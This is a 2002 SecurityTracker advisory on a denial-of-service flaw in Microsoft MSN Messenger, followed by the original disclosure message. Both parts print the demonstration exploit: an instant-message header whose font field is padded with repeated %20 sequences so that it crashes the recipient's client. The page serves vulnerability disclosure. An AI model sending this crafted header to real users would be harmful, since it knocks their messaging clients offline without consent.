Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client - SecurityTracker

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Instant Messaging/IRC/Chat) > MSN Messenger

Vendors: Microsoft

Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client

SecurityTracker Alert ID: 1004226

SecurityTracker URL: http://securitytracker.com/id/1004226

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 7 2002

Impact: Denial of service via network

Exploit Included: Yes

Description: A denial of service vulnerability was reported in Microsoft's MSN Messenger instant messaging client software. A remote user can cause another user's client to crash.

It is reported that a remote user can send an instant message containing a malformed header to a MSN Messenger client to cause the client to crash.

A demonstration exploit header is provided:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22

hey friend, how are you?
<end>

The vendor has reportedly been notified.

Impact: A remote user can cause another user's MSN Messenger client to crash.

Solution: No solution was available at the time of this entry.

Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)

Cause: Exception handling error

Underlying OS: Windows (Any)

Message History: None.

Source Message Contents

Date: 6 May 2002 15:04:13 -0000
Subject: Misformated message header causes msn messenger to crash




Introduction to the flaw.
Msn Messenger is a popular Instant-Messaging client from 
Microsoft. After the previous flaws regarding the privacy 
of users another flaw is discovered. This flaw makes the 
msn messenger client crash after receiving a misformated 
font variable in the message header with instant messages. 

How does it work exactly?
The Msn Messenger client works by sending a header with 
every message. So every time a user wants to send a 
message, it generates a header, containing information 
about the font, the color of the message and some other 
information. 

The flaw
A normal header look something like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

When we replace the font field with something very large. 
Creating an overflaw the header will look like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

As a result the Msn Messenger client will crash

this flaw only crashes the Msn Messenger from Microsoft. 
Trillian is not affected.

This flaw is a severe danger. As it's not so hard for 
hackers to use this flaw in their application. 
Microsoft has been informed on this issue.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2013, SecurityGlobal.net LLC